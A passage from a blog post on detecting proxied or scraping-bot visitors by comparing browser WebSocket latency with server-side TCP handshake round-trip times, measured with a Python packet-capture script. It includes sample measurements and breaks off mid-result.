<span class="kd">var</span> <span class="nx">messages</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">const</span> <span class="nx">latencies</span> <span class="o">=</span> <span class="p">[];</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">onopen</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span>
<span class="nx">type</span><span class="o">:</span> <span class="s1">'ws-latency'</span><span class="p">,</span>
<span class="nx">ts</span><span class="o">:</span> <span class="nx">roundToTwo</span><span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()),</span>
<span class="p">}));</span>
<span class="p">}</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">onmessage</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">messages</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">data</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">messages</span><span class="p">.</span><span class="nx">length</span> <span class="o"><=</span> <span class="mf">5</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span>
<span class="nx">type</span><span class="o">:</span> <span class="s1">'ws-latency'</span><span class="p">,</span>
<span class="nx">ts</span><span class="o">:</span> <span class="nx">roundToTwo</span><span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()),</span>
<span class="p">}));</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">messages</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mf">1</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">latencies</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">roundToTwo</span><span class="p">(</span><span class="nx">messages</span><span class="p">[</span><span class="nx">i</span><span class="o">+</span><span class="mf">1</span><span class="p">].</span><span class="nx">ts</span> <span class="o">-</span> <span class="nx">messages</span><span class="p">[</span><span class="nx">i</span><span class="p">].</span><span class="nx">ts</span><span class="p">));</span>
<span class="p">}</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">median</span><span class="p">(</span><span class="nx">latencies</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="nx">getLatencyWebSocket</span><span class="p">().</span><span class="nx">then</span><span class="p">((</span><span class="nx">median</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">'data'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">median</span><span class="p">;</span>
<span class="p">});</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>For example, when I access the above code with my own browser, I will get a latency of <code>23.6ms</code>.</p>
<p>Those are very promising results. WebSockets don't suffer from internal queuing and stalling issues such as the <code>XMLHttpRequest</code> object. This gives us much more accurate data to work with. WebSockets are designed to support real-time networking applications, so the latency should be similar to the latency that we can measure on an incoming TCP/IP handshake.</p>
<p><strong>Idea:</strong> If the latencies between the TCP/IP handshake and the WebSocket messages don't match with a very low margin of error, then there is likely a tunnel or proxy in between.</p>
<h2>Obtain External IP -> Web Server Latency with TCP/IP handshake RTT</h2>
<p>This is a bit more complex, because I have to hook into the raw TCP/IP handshake. Without much explanation, the Python script below does the job:</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">pypacker</span> <span class="kn">import</span> <span class="n">ppcap</span>
<span class="kn">from</span> <span class="nn">pypacker.layer12</span> <span class="kn">import</span> <span class="n">ethernet</span>
<span class="kn">from</span> <span class="nn">pypacker.layer12</span> <span class="kn">import</span> <span class="n">linuxcc</span>
<span class="kn">from</span> <span class="nn">pypacker.layer3</span> <span class="kn">import</span> <span class="n">ip</span>
<span class="kn">from</span> <span class="nn">pypacker.layer4</span> <span class="kn">import</span> <span class="n">tcp</span>
<span class="kn">from</span> <span class="nn">pypacker.layer4</span> <span class="kn">import</span> <span class="n">ssl</span>
<span class="kn">from</span> <span class="nn">pypacker</span> <span class="kn">import</span> <span class="n">pypacker</span>
<span class="kn">import</span> <span class="nn">pcapy</span>
<span class="kn">import</span> <span class="nn">getopt</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">traceback</span>
<span class="kn">import</span> <span class="nn">signal</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="n">classify</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">interface</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">verbose</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">rtts</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">def</span> <span class="nf">updateFile</span><span class="p">():</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'writing RTTs.json with </span><span class="si">{}</span><span class="s1"> objects...'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">rtts</span><span class="p">)))</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'RTTs2.json'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
<span class="n">json</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">rtts</span><span class="p">,</span> <span class="n">fp</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span> <span class="n">sort_keys</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">signal_handler</span><span class="p">(</span><span class="n">sig</span><span class="p">,</span> <span class="n">frame</span><span class="p">):</span>
<span class="n">updateFile</span><span class="p">()</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">signal</span><span class="o">.</span><span class="n">signal</span><span class="p">(</span><span class="n">signal</span><span class="o">.</span><span class="n">SIGINT</span><span class="p">,</span> <span class="n">signal_handler</span><span class="p">)</span> <span class="c1"># ctlr + c</span>
<span class="n">signal</span><span class="o">.</span><span class="n">signal</span><span class="p">(</span><span class="n">signal</span><span class="o">.</span><span class="n">SIGTSTP</span><span class="p">,</span> <span class="n">signal_handler</span><span class="p">)</span> <span class="c1"># ctlr + z</span>
<span class="k">def</span> <span class="nf">tcpProcess</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">layer</span><span class="p">,</span> <span class="n">ts</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Understand this: https://www.keycdn.com/support/tcp-flags</span>
<span class="sd"> from src -> dst, SYN</span>
<span class="sd"> from dst -> src, SYN-ACK</span>
<span class="sd"> from src -> dst, ACK</span>
<span class="sd"> I want the time between SYN-ACK and first ACK</span>
<span class="sd"> And then I want to record the </span>
<span class="sd"> """</span>
<span class="n">ip4</span> <span class="o">=</span> <span class="n">pkt</span><span class="o">.</span><span class="n">upper_layer</span>
<span class="n">tcp1</span> <span class="o">=</span> <span class="n">pkt</span><span class="o">.</span><span class="n">upper_layer</span><span class="o">.</span><span class="n">upper_layer</span>
<span class="c1"># SYN (1 bit): Synchronize sequence numbers. Only the first packet sent from each</span>
<span class="c1"># end should have this flag set. Some other flags and fields change meaning</span>
<span class="c1"># based on this flag, and some are only valid when it is set, and others when it is clear.</span>
<span class="k">if</span> <span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span><span class="p">:</span>
<span class="n">label</span> <span class="o">=</span> <span class="s1">''</span>
<span class="n">key</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="s1">:</span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">pkt</span><span class="p">[</span><span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">]</span><span class="o">.</span><span class="n">src_s</span><span class="p">,</span> <span class="n">pkt</span><span class="p">[</span><span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span><span class="o">.</span><span class="n">sport</span><span class="p">)</span>
<span class="k">if</span> <span class="n">key</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_SYN</span><span class="p">)</span> <span class="ow">and</span> <span class="ow">not</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_ACK</span><span class="p">):</span>
<span class="n">label</span> <span class="o">=</span> <span class="s1">'SYN'</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">label</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="n">label</span><span class="p">]</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_ACK</span><span class="p">)</span> <span class="ow">and</span> <span class="ow">not</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_SYN</span><span class="p">):</span>
<span class="n">label</span> <span class="o">=</span> <span class="s1">'ACK'</span>
<span class="k">if</span> <span class="s1">'SYN+ACK'</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="ow">and</span> <span class="s1">'ACK'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="n">label</span><span class="p">]</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_SYN</span><span class="p">)</span> <span class="ow">and</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_ACK</span><span class="p">):</span>
<span class="n">key</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="s1">:</span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">pkt</span><span class="p">[</span><span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">]</span><span class="o">.</span><span class="n">dst_s</span><span class="p">,</span> <span class="n">pkt</span><span class="p">[</span><span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span><span class="o">.</span><span class="n">dport</span><span class="p">)</span>
<span class="n">label</span> <span class="o">=</span> <span class="s1">'SYN+ACK'</span>
<span class="k">if</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">rtts</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">label</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="n">label</span><span class="p">]</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="k">if</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">rtts</span> <span class="ow">and</span> <span class="s2">"SYN+ACK"</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="ow">and</span> <span class="s2">"ACK"</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="ow">and</span> <span class="ow">not</span> <span class="s1">'RTT'</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s1">'RTT'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="s1">ms'</span> <span class="o">%</span> <span class="nb">round</span><span class="p">(((</span><span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s2">"ACK"</span><span class="p">]</span> <span class="o">-</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s2">"SYN+ACK"</span><span class="p">])</span> <span class="o">*</span> <span class="mi">1000</span><span class="p">),</span> <span class="mi">2</span><span class="p">)</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s1">'RTT2'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">round</span><span class="p">(</span><span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s2">"ACK"</span><span class="p">]</span> <span class="o">-</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s2">"SYN+ACK"</span><span class="p">],</span> <span class="mi">4</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"TCP Handshake - </span><span class="si">%s</span><span class="s2">:</span><span class="si">%s</span><span class="s2"> -> </span><span class="si">%s</span><span class="s2">:</span><span class="si">%s</span><span class="s2"> [</span><span class="si">%s</span><span class="s2">], RTT=</span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">pkt</span><span class="p">[</span><span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">]</span><span class="o">.</span><span class="n">src_s</span><span class="p">,</span> <span class="n">pkt</span><span class="p">[</span><span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span><span class="o">.</span><span class="n">sport</span><span class="p">,</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">]</span><span class="o">.</span><span class="n">dst_s</span><span class="p">,</span> <span class="n">pkt</span><span class="p">[</span><span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span><span class="o">.</span><span class="n">dport</span><span class="p">,</span> <span class="n">label</span><span class="p">,</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s1">'RTT'</span><span class="p">]))</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">rtts</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">rtts</span><span class="p">)</span> <span class="o">%</span> <span class="mi">13</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">updateFile</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">usage</span><span class="p">():</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"""</span>
<span class="s2"> -i, --interface interface to listen to; example: -i eth0</span>
<span class="s2"> -l, --log log file to write output to; example -l output.txt (not implemented yet)</span>
<span class="s2"> -v, --verbose verbose logging, mostly just telling you where/what we're doing, not recommended if want to parse output typically"""</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">logger</span> <span class="o">=</span> <span class="n">pypacker</span><span class="o">.</span><span class="n">logging</span><span class="o">.</span><span class="n">getLogger</span><span class="p">(</span><span class="s2">"pypacker"</span><span class="p">)</span>
<span class="n">pypacker</span><span class="o">.</span><span class="n">logger</span><span class="o">.</span><span class="n">setLevel</span><span class="p">(</span><span class="n">pypacker</span><span class="o">.</span><span class="n">logging</span><span class="o">.</span><span class="n">ERROR</span><span class="p">)</span>
<span class="n">counter</span> <span class="o">=</span> <span class="mi">0</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'listening on interface </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">interface</span><span class="p">))</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">preader</span> <span class="o">=</span> <span class="n">pcapy</span><span class="o">.</span><span class="n">open_live</span><span class="p">(</span><span class="n">interface</span><span class="p">,</span> <span class="mi">65536</span><span class="p">,</span> <span class="kc">False</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">preader</span><span class="o">.</span><span class="n">setfilter</span><span class="p">(</span><span class="s1">'tcp port 80 or tcp port 443'</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">counter</span> <span class="o">=</span> <span class="n">counter</span> <span class="o">+</span> <span class="mi">1</span>
<span class="p">(</span><span class="n">header</span><span class="p">,</span> <span class="n">buf</span><span class="p">)</span> <span class="o">=</span> <span class="n">preader</span><span class="o">.</span><span class="n">next</span><span class="p">()</span>
<span class="n">ts</span> <span class="o">=</span> <span class="n">header</span><span class="o">.</span><span class="n">getts</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">tcpPacket</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">pkt</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">layer</span> <span class="o">=</span> <span class="kc">None</span>
<span class="c1"># try to determine what type of packets we have, there is the chance that 0x800</span>
<span class="c1"># may be in the spot we're checking, may want to add better testing in future</span>
<span class="n">eth</span> <span class="o">=</span> <span class="n">ethernet</span><span class="o">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">hex</span><span class="p">(</span><span class="n">eth</span><span class="o">.</span><span class="n">type</span><span class="p">)</span> <span class="o">==</span> <span class="s1">'0x800'</span><span class="p">:</span>
<span class="n">layer</span> <span class="o">=</span> <span class="s1">'eth'</span>
<span class="n">pkt</span> <span class="o">=</span> <span class="n">eth</span>
<span class="k">if</span> <span class="p">(</span><span class="n">eth</span><span class="p">[</span><span class="n">ethernet</span><span class="o">.</span><span class="n">Ethernet</span><span class="p">,</span> <span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">,</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">):</span>
<span class="n">tcpPacket</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">lcc</span> <span class="o">=</span> <span class="n">linuxcc</span><span class="o">.</span><span class="n">LinuxCC</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">hex</span><span class="p">(</span><span class="n">lcc</span><span class="o">.</span><span class="n">type</span><span class="p">)</span> <span class="o">==</span> <span class="s1">'0x800'</span><span class="p">:</span>
<span class="n">layer</span> <span class="o">=</span> <span class="s1">'lcc'</span>
<span class="n">pkt</span> <span class="o">=</span> <span class="n">lcc</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lcc</span><span class="p">[</span><span class="n">linuxcc</span><span class="o">.</span><span class="n">LinuxCC</span><span class="p">,</span> <span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">,</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">):</span>
<span class="n">tcpPacket</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">tcpPacket</span> <span class="ow">and</span> <span class="n">pkt</span> <span class="ow">and</span> <span class="n">layer</span><span class="p">:</span>
<span class="n">tcpProcess</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">layer</span><span class="p">,</span> <span class="n">ts</span><span class="p">)</span>
<span class="k">except</span> <span class="p">(</span><span class="ne">KeyboardInterrupt</span><span class="p">,</span> <span class="ne">SystemExit</span><span class="p">):</span>
<span class="k">raise</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="n">error_string</span> <span class="o">=</span> <span class="n">traceback</span><span class="o">.</span><span class="n">format_exc</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">error_string</span><span class="p">))</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">opts</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">getopt</span><span class="o">.</span><span class="n">getopt</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">:],</span> <span class="s2">"i:v:c:"</span><span class="p">,</span> <span class="p">[</span><span class="s1">'interface='</span><span class="p">,</span> <span class="s1">'verbose'</span><span class="p">])</span>
<span class="n">proceed</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">opt</span><span class="p">,</span> <span class="n">val</span> <span class="ow">in</span> <span class="n">opts</span><span class="p">:</span>
<span class="k">if</span> <span class="n">opt</span> <span class="ow">in</span> <span class="p">(</span><span class="s1">'-i'</span><span class="p">,</span> <span class="s1">'--interface'</span><span class="p">):</span>
<span class="n">interface</span> <span class="o">=</span> <span class="n">val</span>
<span class="n">proceed</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">opt</span> <span class="ow">in</span> <span class="p">(</span><span class="s1">'-v'</span><span class="p">,</span> <span class="s1">'--verbose'</span><span class="p">):</span>
<span class="n">verbose</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="p">(</span><span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">)</span> <span class="ow">and</span> <span class="n">proceed</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Need to provide a pcap to read in or an interface to watch'</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">usage</span><span class="p">()</span>
<span class="k">except</span> <span class="n">getopt</span><span class="o">.</span><span class="n">error</span><span class="p">:</span>
<span class="n">usage</span><span class="p">()</span>
</code></pre></div>
<p>Save the above script on your server as <code>lat.py</code> and run it with:</p>
<div class="highlight"><pre><span></span><code>python lat.py -i eth0
</code></pre></div>
<p>My RTT measurement tool will produce output as listed below. The sample was taken from someone from South America visiting my blog:</p>
<div class="highlight"><pre><span></span><code><span class="mf">1623092439</span><span class="o">:</span> <span class="mf">192.123.255.204</span><span class="o">:</span><span class="mf">65238</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">231.72</span><span class="nx">ms</span>
<span class="mf">1623092439</span><span class="o">:</span> <span class="mf">192.123.255.204</span><span class="o">:</span><span class="mf">65237</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">239.88</span><span class="nx">ms</span>
<span class="mf">1623092439</span><span class="o">:</span> <span class="mf">192.123.255.204</span><span class="o">:</span><span class="mf">65240</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">239.9</span><span class="nx">ms</span>
<span class="p">...</span>
</code></pre></div>
<h2>Testing the XMLHttpRequest Latency Technique</h2>
<p>I will visit the following detection test site: <a href="https://bot.incolumitas.com/latency.html">https://bot.incolumitas.com/latency.html</a> twice:</p>
<ol>
<li>Once with my normal browser without any proxy</li>
<li>The second time with a scraping service that uses a proxy</li>
</ol>
<p>And on the server side, I will let my TCP/IP latency measurement tool running.</p>
<p>First, I will test latencies with my own browser without using any proxy.</p>
<p>Latencies recorded from the TCP/IP handshake:</p>
<div class="highlight"><pre><span></span><code><span class="mf">1623144210</span><span class="o">:</span> <span class="mf">84.151.230.146</span><span class="o">:</span><span class="mf">33724</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">15.79</span><span class="nx">ms</span>
<span class="mf">1623144211</span><span class="o">:</span> <span class="mf">84.151.230.146</span><span class="o">:</span><span class="mf">33726</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">23.87</span><span class="nx">ms</span>
<span class="mf">1623144211</span><span class="o">:</span> <span class="mf">84.151.230.146</span><span class="o">:</span><span class="mf">33728</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">15.82</span><span class="nx">ms</span>
<span class="mf">1623144211</span><span class="o">:</span> <span class="mf">84.151.230.146</span><span class="o">:</span><span class="mf">33732</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">15.53</span><span class="nx">ms</span>
<span class="p">...</span>
</code></pre></div>
<p>Latencies recorded from the browser with JavaScript</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="s2">"median"</span><span class="o">:</span> <span class="mf">136.4</span><span class="p">,</span>
<span class="s2">"measurements"</span><span class="o">:</span> <span class="p">[</span><span class="mf">109.9</span><span class="p">,</span> <span class="mf">116.2</span><span class="p">,</span> <span class="mf">124.8</span><span class="p">,</span> <span class="mf">134.4</span><span class="p">,</span> <span class="mf">134.6</span><span class="p">,</span> <span class="mf">136.4</span><span class="p">,</span> <span class="mf">165</span><span class="p">,</span> <span class="mf">175</span><span class="p">,</span> <span class="mf">181.5</span><span class="p">,</span> <span class="mf">190.5</span><span class="p">,</span> <span class="mf">196</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div>
<p>And now I will visit my <a href="https://bot.incolumitas.com/latency.html">test site</a> with a scraping service.</p>
<p>Latencies recorded from the TCP/IP handshake:</p>
<div class="highlight"><pre><span></span><code><span class="mf">1623144996</span><span class="o">:</span> <span class="mf">24.125.86.142</span><span class="o">:</span><span class="mf">56938</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">127.85</span><span class="nx">ms</span>
<span class="mf">1623144997</span><span class="o">:</span> <span class="mf">24.125.86.142</span><span class="o">:</span><span class="mf">55420</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">183.9</span><span class="nx">ms</span>
<span class="mf">1623144997</span><span class="o">:</span> <span class="mf">24.125.86.142</span><span class="o">:</span><span class="mf">47526</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">136.08</span><span class="nx">ms</span>
<span class="p">...</span>
</code></pre></div>
<p>Latencies recorded from the browser with JavaScript</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="s2">"median"</span><span class="o">:</span> <span class="mf">1147.83</span><span class="p">,</span>
